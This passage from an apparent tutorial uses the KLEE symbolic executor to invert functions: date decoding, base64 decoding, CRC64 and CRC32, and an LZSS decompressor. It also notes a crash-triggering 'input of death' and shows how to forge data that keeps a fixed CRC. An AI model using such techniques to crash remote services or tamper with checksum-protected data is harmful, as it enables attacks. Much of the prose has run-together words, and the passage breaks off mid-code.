KLEE: done: total instructions = 101716
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 2

This is the same UNIX time value we've already seen:

% ls klee-last | grep err
test000001.exec.err
test000002.ptr.err

% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args       : ['klee_time2.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 978278400

So, if this piece of code can be triggered on a remote computer with this input value (an input of death), it's possible to crash the process (with some luck, though).

OK, now I'm fixing the bug by moving the year-subtracting expression down to line 43, and let's find out what UNIX time value corresponds to some fancy date like 2022-February-22:

1   #include <stdio.h>
2   #include <stdint.h>
3   #include <time.h>
4
5   #define YEAR0 1900
6   #define EPOCH_YR 1970
7   #define SECS_DAY (24L * 60L * 60L)
8   #define YEARSIZE(year) (LEAPYEAR(year) ?
366 : 365)
9
10  const int _ytab[2][12] =
11  {
12      { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 },
13      { 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 }
14  };
15
16  #define LEAPYEAR(year) (!((year) % 4) && (((year) % 100) || !((year) % 400)))
17
18  void decode_UNIX_time(const time_t time)
19  {
20      unsigned int dayclock, dayno;
21      int year = EPOCH_YR;
22
23      dayclock = (unsigned long)time % SECS_DAY;
24      dayno = (unsigned long)time / SECS_DAY;
25
26      int seconds = dayclock % 60;
27      int minutes = (dayclock % 3600) / 60;
28      int hour = dayclock / 3600;
29      int wday = (dayno + 4) % 7;
30      while (dayno >= YEARSIZE(year))
31      {
32          dayno -= YEARSIZE(year);
33          year++;
34      }
35
36      int month = 0;
37
38      while (dayno >= _ytab[LEAPYEAR(year)][month])
39      {
40          dayno -= _ytab[LEAPYEAR(year)][month];
41          month++;
42      }
43      year = year - YEAR0;
44
45      if (YEAR0+year==2022 && month==1 && dayno+1==22)
46          klee_assert(0);
47  }
48  int main()
49  {
50      uint32_t time;
51
52      klee_make_symbolic(&time, sizeof time, "time");
53
54      decode_UNIX_time(time);
55
56      return 0;
57  }

% clang -emit-llvm -c -g klee_time3.c
...
% klee klee_time3.bc
KLEE: output directory is "/home/klee/klee-out-109"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_time3.c:47: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 101087
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 1635

% ls klee-last | grep err
test000587.external.err

% ktest-tool --write-ints klee-last/test000587.ktest
ktest file : 'klee-last/test000587.ktest'
args       : ['klee_time3.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 1645488640

% date -u --date='@1645488640'
Tue Feb 22 00:10:40 UTC 2022

Success, but the hours/minutes/seconds seem random. They are random indeed, because KLEE satisfied all the constraints we've put, nothing else.
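As a quick cross-check (my addition, not part of the original text), Python's time.gmtime() agrees with the date(1) output for the value KLEE produced:

```python
import time

# 1645488640 is the satisfying UNIX time value from the ktest file above:
t = time.gmtime(1645488640)
print(t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec)
# 2022 2 22 0 10 40  (i.e. Tue Feb 22 00:10:40 UTC 2022)
```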
Wedidn’taskittosethours/minutes/secondstozeroes. Let’saddconstraintstohours/minutes/secondsaswell: ... if (YEAR0+year==2022 && month==1 && dayno+1==22 && hour==22 && minutes==22 && seconds==22) klee_assert(0); ... Let’srunitandcheck... % ktest-tool --write-ints klee-last/test000597.ktest ktest file : 'klee-last/test000597.ktest' args : ['klee_time3.bc'] num objects: 1 object 0: name: b'time' object 0: size: 4 object 0: data: 1645568542 % date -u --date='@1645568542' Tue Feb 22 22:22:22 UTC 2022 Nowthatisprecise. Yes,ofcourse,C/C++librarieshasfunction(s)toencodehuman-readabledateintoUNIXtimevalue,but whatwe’vegothereisKLEEworking antipodeofdecodingfunction, inversefunction inaway. 9.8 Inverse function for base64 decoder It’spieceofcakeforKLEEtoreconstructinputbase64stringgivenjustbase64decodercodewithoutcor- responding encoder code. I’ve copypasted this piece of code from http://www.opensource.apple.com/ source/QuickTimeStreamingServer/QuickTimeStreamingServer-452/CommonUtilitiesLib/base64.c . Weaddconstraints(lines84,85)sothatoutputbuffermusthavebytevaluesfrom0to15. Wealsotell toKLEEthattheBase64decode()functionmustreturn16(i.e.,sizeofoutputbufferinbytes,line82). 
1   #include <stdio.h>
2   #include <stdint.h>
3   #include <string.h>
4
5   // copypasted from http://www.opensource.apple.com/source/QuickTimeStreamingServer/QuickTimeStreamingServer-452/CommonUtilitiesLib/base64.c
6
7   static const unsigned char pr2six[256] =
8   {
9       /* ASCII table */
10      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
11      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
12      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
13      52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
14      64,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
15      15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
16      64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
17      41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
18      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
19      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
20      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
21      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
22      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
23      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
24      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
25      64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
26  };
27
28  int Base64decode(char *bufplain, const char *bufcoded)
29  {
30      int nbytesdecoded;
31      register const unsigned char *bufin;
32      register unsigned char *bufout;
33      register int nprbytes;
34
35      bufin = (const unsigned char *) bufcoded;
36      while (pr2six[*(bufin++)] <= 63);
37      nprbytes = (bufin - (const unsigned char *) bufcoded) - 1;
38      nbytesdecoded = ((nprbytes + 3) / 4) * 3;
39
40      bufout = (unsigned char *) bufplain;
41      bufin = (const unsigned char *) bufcoded;
42
43      while (nprbytes > 4) {
44          *(bufout++) =
45              (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
46          *(bufout++) =
47              (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
48          *(bufout++) =
49  
            (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
50          bufin += 4;
51          nprbytes -= 4;
52      }
53
54      /* Note: (nprbytes == 1) would be an error, so just ignore that case */
55      if (nprbytes > 1) {
56          *(bufout++) =
57              (unsigned char) (pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
58      }
59      if (nprbytes > 2) {
60          *(bufout++) =
61              (unsigned char) (pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
62      }
63      if (nprbytes > 3) {
64          *(bufout++) =
65              (unsigned char) (pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
66      }
67
68      *(bufout++) = '\0';
69      nbytesdecoded -= (4 - nprbytes) & 3;
70      return nbytesdecoded;
71  }
72
73  int main()
74  {
75      char input[32];
76      uint8_t output[16+1];
77
78      klee_make_symbolic(input, sizeof input, "input");
79
80      klee_assume(input[31]==0);
81
82      klee_assume (Base64decode(output, input)==16);
83
84      for (int i=0; i<16; i++)
85          klee_assume (output[i]==i);
86
87      klee_assert(0);
88
89      return 0;
90  }

% clang -emit-llvm -c -g klee_base64.c
...
% klee klee_base64.bc
KLEE: output directory is "/home/klee/klee-out-99"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: ERROR: /home/klee/klee_base64.c:99: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_base64.c:104: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:85: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:81: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_base64.c:65: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
...
We’reinterestingintheseconderror,where klee_assert() hasbeentriggered: % ls klee-last | grep err test000001.user.err test000002.external.err test000003.ptr.err test000004.ptr.err test000005.ptr.err % ktest-tool --write-ints klee-last/test000002.ktest ktest file : 'klee-last/test000002.ktest' args : ['klee_base64.bc'] num objects: 1 object 0: name: b'input' object 0: size: 32 object 0: data: b'AAECAwQFBgcICQoLDA0OD4\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00' Thisisindeedarealbase64string,terminatedwiththezerobyte,justasit’srequestedbyC/C++stan- dards.Thefinalzerobyteat31thbyte(startingatzerothbyte)isourdeed:sothatKLEEwouldreportlesser numberoferrors. Thebase64stringisindeedcorrect: % echo AAECAwQFBgcICQoLDA0OD4 | base64 -d | hexdump -C base64: invalid input 00000000 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................| 00000010 base64 decoder Linux utility I’ve just run blaming for “invalid input”—it means the input string is not properlypadded. Nowlet’spaditmanually,anddecoderutilitywillnocomplainanymore: % echo AAECAwQFBgcICQoLDA0OD4== | base64 -d | hexdump -C 00000000 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................| 00000010 Thereasonourgeneratedbase64stringisnotpaddedisbecausebase64decodersareusuallydiscards paddingsymbols(“=”)attheend. Inotherwords,theyarenotrequirethem,soisthecaseofourdecoder. Hence,paddingsymbolsareleftunnoticedtoKLEE. Soweagainmade antipodeorinversefunction ofbase64decoder. 95 9.9 CRC (Cyclic redundancy check) 9.9.1 Buffer alteration case #1 Sometimes,youneedtoalterapieceofdatawhichis protectedbysomekindofchecksumor CRC,andyou can’tchangechecksumorCRCvalue,butcanalterpieceofdatasothatchecksumwillremainthesame. Let’spretend,we’vegotapieceofdatawith“Hello,world!” stringatthebeginningand“andgoodbye” stringattheend. Wecanalter14charactersatthemiddle,butforsomereason,theymustbein a..zlimits, butwecanputanycharactersthere. CRC64ofthewholeblockmustbe 0x12345678abcdef12 . 
Let’ssee77: #include #include uint64_t crc64(uint64_t crc, unsigned char *buf, int len) { int k; crc = crc; while (len--) { crc ^= *buf++; for (k = 0; k < 8; k++) crc = crc & 1 ? (crc >> 1) ^ 0x42f0e1eba9ea3693 : crc >> 1; } return crc; } int main() { #define HEAD_STR "Hello, world!.. " #define HEAD_SIZE strlen(HEAD_STR) #define TAIL_STR " ... and goodbye" #define TAIL_SIZE strlen(TAIL_STR) #define MID_SIZE 14 // work #define BUF_SIZE HEAD_SIZE+TAIL_SIZE+MID_SIZE char buf[BUF_SIZE]; klee_make_symbolic(buf, sizeof buf, "buf"); klee_assume (memcmp (buf, HEAD_STR, HEAD_SIZE)==0); for (int i=0; i='a' && buf[HEAD_SIZE+i]<='z'); klee_assume (memcmp (buf+HEAD_SIZE+MID_SIZE, TAIL_STR, TAIL_SIZE)==0); klee_assume (crc64 (0, buf, BUF_SIZE)==0x12345678abcdef12); klee_assert(0); return 0; } Since our code uses memcmp() standard C/C++ function, we need to add --libc=uclibc switch, so KLEEwilluseitsownuClibcimplementation. % clang -emit-llvm -c -g klee_CRC64.c % time klee --libc=uclibc klee_CRC64.bc Ittakesabout1minute(onmyIntelCorei3-3110M2.4GHznotebook)andwegettingthis: ... real 0m52.643s user 0m51.232s sys 0m0.239s ... % ls klee-last | grep err test000001.user.err test000002.user.err 77ThereareseveralslightlydifferentCRC64implementations,theoneIuseherecanalsobedifferentfrompopularones. 96 test000003.user.err test000004.external.err % ktest-tool --write-ints klee-last/test000004.ktest ktest file : 'klee-last/test000004.ktest' args : ['klee_CRC64.bc'] num objects: 1 object 0: name: b'buf' object 0: size: 46 object 0: data: b'Hello, world!.. qqlicayzceamyw ... and goodbye' Maybeit’sslow,butdefinitelyfasterthanbruteforce. Indeed, log2261465:8whichiscloseto64bits. In otherwords,oneneed 14latincharacterstoencode64bits.AndKLEE+ SMTsolverneeds64bitsatsome placeitcanaltertomakefinalCRC64valueequaltowhatwedefined. Itriedtoreducelengthofthe middleblock to13characters:noluckforKLEEthen,ithasnospaceenough. 
9.9.2 Buffer alteration case #2

I went even further: what if the buffer must contain the very CRC64 value which the CRC64 calculation over the whole buffer produces? Fascinatingly, KLEE can solve this. The buffer will have the following format:

 Hello, world! <8 bytes (64-bit value)> and goodbye <6 more bytes>

int main()
{
#define HEAD_STR "Hello, world!.. "
#define HEAD_SIZE strlen(HEAD_STR)
#define TAIL_STR " ... and goodbye"
#define TAIL_SIZE strlen(TAIL_STR)
// 8 bytes for 64-bit value:
#define MID_SIZE 8
#define BUF_SIZE HEAD_SIZE+TAIL_SIZE+MID_SIZE+6

	char buf[BUF_SIZE];

	klee_make_symbolic(buf, sizeof buf, "buf");
	klee_assume (memcmp (buf, HEAD_STR, HEAD_SIZE)==0);
	klee_assume (memcmp (buf+HEAD_SIZE+MID_SIZE, TAIL_STR, TAIL_SIZE)==0);
	uint64_t mid_value=*(uint64_t*)(buf+HEAD_SIZE);
	klee_assume (crc64 (0, buf, BUF_SIZE)==mid_value);
	klee_assert(0);
	return 0;
}

It works:

 % time klee --libc=uclibc klee_CRC64.bc
 ...
 real 5m17.081s
 user 5m17.014s
 sys 0m0.319s
 % ls klee-last | grep err
 test000001.user.err
 test000002.user.err
 test000003.external.err
 % ktest-tool --write-ints klee-last/test000003.ktest
 ktest file : 'klee-last/test000003.ktest'
 args : ['klee_CRC64.bc']
 num objects: 1
 object 0: name: b'buf'
 object 0: size: 46
 object 0: data: b'Hello, world!.. T+]\xb9A\x08\x0fq ... and goodbye\xb6\x8f\x9c\xd8\xc5\x00'

The 8 bytes between the two strings are a 64-bit value which equals the CRC64 of this whole block. Again, this is faster than finding it by brute force. If the last spare 6-byte buffer is decreased to 4 bytes or fewer, KLEE works for so long that I stopped it.

9.9.3 Recovering input data for a given CRC32 value of it

I've always wanted to do this, but everyone knows it is impossible for input buffers larger than 4 bytes. As my experiments show, it's still possible for tiny input buffers which are constrained in some way.

The CRC32 value of the 6-byte "SILVER" string is known: 0xDFA3DFDD.
KLEE can find this 6-byte string, if it knows that each byte of the input buffer is within the A..Z limits:

1  #include <stdint.h>
2  #include <stdbool.h>
3
4  uint32_t crc32(uint32_t crc, unsigned char *buf, int len)
5  {
6  	int k;
7
8  	crc = ~crc;
9  	while (len--)
10 	{
11 		crc ^= *buf++;
12 		for (k = 0; k < 8; k++)
13 			crc = crc & 1 ? (crc >> 1) ^ 0xedb88320 : crc >> 1;
14 	}
15 	return ~crc;
16 }
17
18 #define SIZE 6
19
20 bool find_string(char str[SIZE])
21 {
22 	int i=0;
23 	for (i=0; i<SIZE; i++)
24 		if (str[i]<'A' || str[i]>'Z')
25 			return false;
26
27 	if (crc32(0, &str[0], SIZE)!=0xDFA3DFDD)
28 		return false;
29
30 	// OK, input str is valid
31 	klee_assert(0); // force KLEE to produce .err file
32 	return true;
33 };
34
35 int main()
36 {
37 	uint8_t str[SIZE];
38
39 	klee_make_symbolic(str, sizeof str, "str");
40
41 	find_string(str);
42
43 	return 0;
44 }

 % clang -emit-llvm -c -g klee_SILVER.c
 ...
 % klee klee_SILVER.bc
 ...
 % ls klee-last | grep err
 test000013.external.err
 % ktest-tool --write-ints klee-last/test000013.ktest
 ktest file : 'klee-last/test000013.ktest'
 args : ['klee_SILVER.bc']
 num objects: 1
 object 0: name: b'str'
 object 0: size: 6
 object 0: data: b'SILVER'

Still, it's no magic: if we remove the condition at lines 23..25 (i.e., relax the constraints), KLEE will produce some other string, which will still be correct for the given CRC32 value.

It works because 6 Latin characters in the A..Z limits contain ≈28.2 bits: log2(26^6) ≈ 28.2, which is even smaller than 32. In other words, the final CRC32 value holds enough bits to recover 28.2 bits of input. The input buffer can be even bigger, if each byte of it is under even tighter constraints (decimal digits, binary digits, etc.).

9.9.4 In comparison with other hashing algorithms

Things are that easy for some other hashing algorithms like the Fletcher checksum, but not for cryptographically secure ones (like MD5, SHA1, etc.): they are protected from such simple cryptanalysis. See also: 10.

9.10 LZSS decompressor

I've googled for a very simple LZSS78 decompressor and landed at this page: http://www.opensource.apple.com/source/boot/boot-132/i386/boot2/lzss.c.
Let's pretend we're looking at an unknown compression algorithm with no compressor available. Will it be possible to reconstruct a compressed piece of data so that the decompressor would generate the data we need? Here is my first experiment:

// copypasted from http://www.opensource.apple.com/source/boot/boot-132/i386/boot2/lzss.c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

//#define N 4096 /* size of ring buffer - must be power of 2 */
#define N 32 /* size of ring buffer - must be power of 2 */
#define F 18 /* upper limit for match_length */
#define THRESHOLD 2 /* encode string into position and length if match_length is greater than this */
#define NIL N /* index for root of binary search trees */

int decompress_lzss(uint8_t *dst, uint8_t *src, uint32_t srclen)
{
	/* ring buffer of size N, with extra F-1 bytes to aid string comparison */
	uint8_t *dststart = dst;
	uint8_t *srcend = src + srclen;
	int i, j, k, r, c;
	unsigned int flags;
	uint8_t text_buf[N + F - 1];

	dst = dststart;
	srcend = src + srclen;
	for (i = 0; i < N - F; i++)
		text_buf[i] = ' ';
	r = N - F;
	flags = 0;
	for ( ; ; )
	{
		if (((flags >>= 1) & 0x100) == 0)
		{
			if (src < srcend) c = *src++; else break;
			flags = c | 0xFF00; /* uses higher byte cleverly */
		}                          /* to count eight */
		if (flags & 1)
		{
			if (src < srcend) c = *src++; else break;
			*dst++ = c;
			text_buf[r++] = c;
			r &= (N - 1);
		}
		else
		{
			if (src < srcend) i = *src++; else break;
			if (src < srcend) j = *src++; else break;
			i |= ((j & 0xF0) << 4);
			j = (j & 0x0F) + THRESHOLD;
			for (k = 0; k <= j; k++)
			{
				c = text_buf[(i + k) & (N - 1)];
				*dst++ = c;
				text_buf[r++] = c;
				r &= (N - 1);
			}
		}
	}

	return dst - dststart;
}

78 Lempel–Ziv–Storer–Szymanski

int main()
{
#define COMPRESSED_LEN 15

	uint8_t input[COMPRESSED_LEN];
	uint8_t plain[24];
	uint32_t size=COMPRESSED_LEN;

	klee_make_symbolic(input, sizeof input, "input");
	decompress_lzss(plain, input, size);
	// https://en.wikipedia.org/wiki/Buffalo_buffalo_Buffalo_buffalo_buffalo_buffalo_Buffalo_buffalo
	for (int i=0; i<23; i++)
		klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
	klee_assert(0);
	return 0;
}

What I did is change the size of the ring buffer from 4096 to 32, because with a bigger one KLEE consumes all the RAM79 it can. But I've found that KLEE can live with that small buffer. I've also decreased COMPRESSED_LEN gradually to check whether KLEE would still find a compressed piece of data, and it did:

 % clang -emit-llvm -c -g klee_lzss.c
 ...
 % time klee klee_lzss.bc
 KLEE: output directory is "/home/klee/klee-out-7"
 KLEE: WARNING: undefined reference to function: klee_assert
 KLEE: ERROR: /home/klee/klee_lzss.c:122: invalid klee_assume call (provably false)
 KLEE: NOTE: now ignoring this error at this location
 KLEE: ERROR: /home/klee/klee_lzss.c:47: memory error: out of bound pointer
 KLEE: NOTE: now ignoring this error at this location
 KLEE: ERROR: /home/klee/klee_lzss.c:37: memory error: out of bound pointer
 KLEE: NOTE: now ignoring this error at this location
 KLEE: WARNING ONCE: calling external: klee_assert(0)
 KLEE: ERROR: /home/klee/klee_lzss.c:124: failed external call: klee_assert
 KLEE: NOTE: now ignoring this error at this location
 KLEE: done: total instructions = 41417919
 KLEE: done: completed paths = 437820
 KLEE: done: generated tests = 4

 real 13m0.215s
 user 11m57.517s
 sys 1m2.187s
 % ls klee-last | grep err
 test000001.user.err
 test000002.ptr.err
 test000003.ptr.err
 test000004.external.err
 % ktest-tool --write-ints klee-last/test000004.ktest
 ktest file : 'klee-last/test000004.ktest'
 args : ['klee_lzss.bc']
 num objects: 1
 object 0: name: b'input'
 object 0: size: 15
 object 0: data: b'\xffBuffalo \x01b\x0f\x03\r\x05'

KLEE consumed 1GB of RAM and worked for 15 minutes (on my Intel Core i3-3110M 2.4GHz notebook), but here it is: 15 bytes which, if decompressed by our copypasted algorithm, result in the desired text!

79 Random-access memory
During my experimentation, I've found that KLEE can do an even cooler thing: find the size of the compressed piece of data:

int main()
{
	uint8_t input[24];
	uint8_t plain[24];
	uint32_t size;

	klee_make_symbolic(input, sizeof input, "input");
	klee_make_symbolic(&size, sizeof size, "size");
	decompress_lzss(plain, input, size);
	for (int i=0; i<23; i++)
		klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
	klee_assert(0);
	return 0;
}

...but then KLEE works much slower, consumes much more RAM, and I had success only with even smaller pieces of the desired text.

So how does LZSS work? Without peeking into Wikipedia, we can say this: if the LZSS compressor observes some data it has already seen, it replaces the data with a link to some place in the past, plus a size. If it observes something yet unseen, it puts the data as is. That's the theory.

And this is indeed what we've got. The desired text is three "Buffalo" words; the first and the last are equivalent, but the second is almost equivalent, differing from the first by one character. That's what we see:

 '\xffBuffalo \x01b\x0f\x03\r\x05'

Here is some control byte (0xff), the word "Buffalo " placed as is, then another control byte (0x01), then the beginning of the second word ("b") and more control bytes, presumably links to the beginning of the buffer. These are commands to the decompressor, saying, in plain English, "copy data from the output we've already produced, from that place to that place", etc.

Interesting: is it possible to meddle with this piece of compressed data? Out of whim, can we force KLEE to find a compressed piece of data where not just the "b" character is placed as is, but also the second character of the word, i.e., "bu"?

I've modified the main() function by adding a klee_assume(): now the 11th byte of the input (compressed) data (right after the "b" byte) must be "u".
I had no luck with 15 bytes of compressed data, so I increased it to 16 bytes:

int main()
{
#define COMPRESSED_LEN 16

	uint8_t input[COMPRESSED_LEN];
	uint8_t plain[24];
	uint32_t size=COMPRESSED_LEN;

	klee_make_symbolic(input, sizeof input, "input");
	klee_assume(input[11]=='u');
	decompress_lzss(plain, input, size);
	for (int i=0; i<23; i++)
		klee_assume (plain[i]=="Buffalo buffalo Buffalo"[i]);
	klee_assert(0);
	return 0;
}

...and voilà: KLEE found a compressed piece of data which satisfies our whimsical constraint:

 % time klee klee_lzss.bc
 KLEE: output directory is "/home/klee/klee-out-9"
 KLEE: WARNING: undefined reference to function: klee_assert
 KLEE: ERROR: /home/klee/klee_lzss.c:97: invalid klee_assume call (provably false)
 KLEE: NOTE: now ignoring this error at this location
 KLEE: ERROR: /home/klee/klee_lzss.c:47: memory error: out of bound pointer
 KLEE: NOTE: now ignoring this error at this location
 KLEE: ERROR: /home/klee/klee_lzss.c:37: memory error: out of bound pointer
 KLEE: NOTE: now ignoring this error at this location
 KLEE: WARNING ONCE: calling external: klee_assert(0)
 KLEE: ERROR: /home/klee/klee_lzss.c:99: failed external call: klee_assert
 KLEE: NOTE: now ignoring this error at this location
 KLEE: done: total instructions = 36700587
 KLEE: done: completed paths = 369756
 KLEE: done: generated tests = 4

 real 12m16.983s
 user 11m17.492s
 sys 0m58.358s
 % ktest-tool --write-ints klee-last/test000004.ktest
 ktest file : 'klee-last/test000004.ktest'
 args : ['klee_lzss.bc']
 num objects: 1
 object 0: name: b'input'
 object 0: size: 16
 object 0: data: b'\xffBuffalo \x13bu\x10\x02\r\x05'

So now we've found a piece of compressed data where two strings are placed as is: "Buffalo " and "bu".

 '\xffBuffalo \x13bu\x10\x02\r\x05'

Both pieces of compressed data, if fed into our copypasted function, produce the "Buffalo buffalo Buffalo" text string.

Please note: I still have no access to the LZSS compressor code, and I haven't got into the LZSS decompressor details yet.
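Both claims are easy to verify outside KLEE. Here is a direct Python port of the copypasted decompressor (a sketch, assuming it mirrors the C routine above exactly, including the reduced ring buffer N=32), fed with the two buffers KLEE produced:

```python
N, F, THRESHOLD = 32, 18, 2  # same constants as the reduced C version

def decompress_lzss(src: bytes) -> bytes:
    text_buf = bytearray(b' ' * (N + F - 1))  # ring buffer, pre-filled with spaces
    dst = bytearray()
    r = N - F
    flags = 0
    pos = 0
    while True:
        flags >>= 1
        if (flags & 0x100) == 0:             # out of flag bits: reload 8 of them
            if pos >= len(src):
                break
            flags = src[pos] | 0xFF00
            pos += 1
        if flags & 1:                        # literal byte, copied as is
            if pos >= len(src):
                break
            c = src[pos]; pos += 1
            dst.append(c)
            text_buf[r] = c
            r = (r + 1) & (N - 1)
        else:                                # back-reference: position + length
            if pos + 1 >= len(src):
                break
            i = src[pos]; j = src[pos + 1]; pos += 2
            i |= (j & 0xF0) << 4
            j = (j & 0x0F) + THRESHOLD
            for k in range(j + 1):
                c = text_buf[(i + k) & (N - 1)]
                dst.append(c)
                text_buf[r] = c
                r = (r + 1) & (N - 1)
    return bytes(dst)

# the two buffers KLEE produced:
print(decompress_lzss(b'\xffBuffalo \x01b\x0f\x03\r\x05'))   # b'Buffalo buffalo Buffalo'
print(decompress_lzss(b'\xffBuffalo \x13bu\x10\x02\r\x05'))  # b'Buffalo buffalo Buffalo'
```

Tracing the second buffer also confirms the reading above: 0xff flags eight literals ("Buffalo "), 0x13 flags the literals "b" and "u", and the remaining byte pairs are back-references into the ring buffer.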
Unfortunately, things are not that cool: KLEE is very slow, and I had success only with small pieces of text; also, the ring buffer size had to be decreased significantly (the original LZSS decompressor with its 4096-byte ring buffer cannot correctly decompress what we found). Nevertheless, it's very impressive, taking into account the fact that we are not getting into the internals of this specific LZSS decompressor. Once more, we've created the antipode of the decompressor, or its inverse function.

Also, it seems KLEE isn't very good so far with decompression algorithms (but who is?). I've also tried various JPEG/PNG/GIF decoders (which, of course, contain decompressors), starting with the simplest possible, and KLEE got stuck.

9.11 strtodx() from RetroBSD

I just found this function in RetroBSD: https://github.com/RetroBSD/retrobsd/blob/master/src/libc/stdlib/strtod.c. It converts a string into a floating point number for a given radix.

1  #include <stdlib.h>
2
3  // my own version, only for radix 10:
4  int isdigitx (char c, int radix)
5  {
6  	if (c>='0' && c<='9')
7  		return 1;
8  	return 0;
9  };
10
11 /*
12  * double strtodx (char *string, char **endPtr, int radix)
13  * This procedure converts a floating-point number from an ASCII
14  * decimal representation to internal double-precision format.
15  *
16  * Original sources taken from 386bsd and modified for variable radix
17  * by Serge Vakulenko, .
18  *
19  * Arguments:
20  * string
21  *     A decimal ASCII floating-point number, optionally preceded
22  *     by white space. Must have form "-I.FE-X", where I is the integer
23  *     part of the mantissa, F is the fractional part of the mantissa,
24  *     and X is the exponent. Either of the signs may be "+", "-", or
25  *     omitted. Either I or F may be omitted, or both. The decimal point
26  *     isn't necessary unless F is present. The "E" may actually be an "e",
27  *     or "E", "S", "s", "F", "f", "D", "d", "L", "l".
28  *     E and X may both be omitted (but not just one).
29  *
30  * endPtr
31  *     If non-NULL, store terminating character's address here.
32  *
33  * radix
34  *     Radix of floating point, one of 2, 8, 10, 16.
35 * 36 * The return value is the double-precision floating-point 37 * representation of the characters in string. If endPtr isn't 38 * NULL, then *endPtr is filled in with the address of the 39 * next character after the last one that was part of the 40 * floating-point number. 41 */ 42 double strtodx (char *string, char **endPtr, int radix) 43 { 44 int sign = 0, expSign = 0, fracSz, fracOff, i; 45 double fraction, dblExp, *powTab; 46 register char *p; 47 register char c; 48 49 /* Exponent read from "EX" field. */ 50 int exp = 0; 51 52 /* Exponent that derives from the fractional part. Under normal 53 * circumstances, it is the negative of the number of digits in F. 54 * However, if I is very long, the last digits of I get dropped 55 * (otherwise a long I with a large negative exponent could cause an 56 * unnecessary overflow on I alone). In this case, fracExp is 57 * incremented one for each dropped digit. */ 58 int fracExp = 0; 59 60 /* Number of digits in mantissa. */ 61 int mantSize; 62 63 /* Number of mantissa digits BEFORE decimal point. */ 64 int decPt; 65 66 /* Temporarily holds location of exponent in string. */ 67 char *pExp; 68 69 /* Largest possible base 10 exponent. 70 * Any exponent larger than this will already 71 * produce underflow or overflow, so there's 72 * no need to worry about additional digits. */ 73 static int maxExponent = 307; 74 75 /* Table giving binary powers of 10. 76 * Entry is 10^2^i. Used to convert decimal 77 * exponents into floating-point numbers. 
*/ 78 static double powersOf10[] = { 79 1e1, 1e2, 1e4, 1e8, 1e16, 1e32, //1e64, 1e128, 1e256, 80 }; 81 static double powersOf2[] = { 82 2, 4, 16, 256, 65536, 4.294967296e9, 1.8446744073709551616e19, 83 //3.4028236692093846346e38, 1.1579208923731619542e77, 1.3407807929942597099e154, 84 }; 85 static double powersOf8[] = { 86 8, 64, 4096, 2.81474976710656e14, 7.9228162514264337593e28, 87 //6.2771017353866807638e57, 3.9402006196394479212e115, 1.5525180923007089351e231, 88 }; 89 static double powersOf16[] = { 90 16, 256, 65536, 1.8446744073709551616e19, 91 //3.4028236692093846346e38, 1.1579208923731619542e77, 1.3407807929942597099e154, 92 }; 93 94 /* 95 * Strip off leading blanks and check for a sign. 96 */ 97 p = string; 98 while (*p==' ' || *p=='\t') 99 ++p; 100 if (*p == '-') { 101 sign = 1; 102 ++p; 103 } else if (*p == '+') 104 ++p; 105 106 /* 107 * Count the number of digits in the mantissa (including the decimal 103 108 * point), and also locate the decimal point. 109 */ 110 decPt = -1; 111 for (mantSize=0; ; ++mantSize) { 112 c = *p; 113 if (!isdigitx (c, radix)) { 114 if (c != '.' || decPt >= 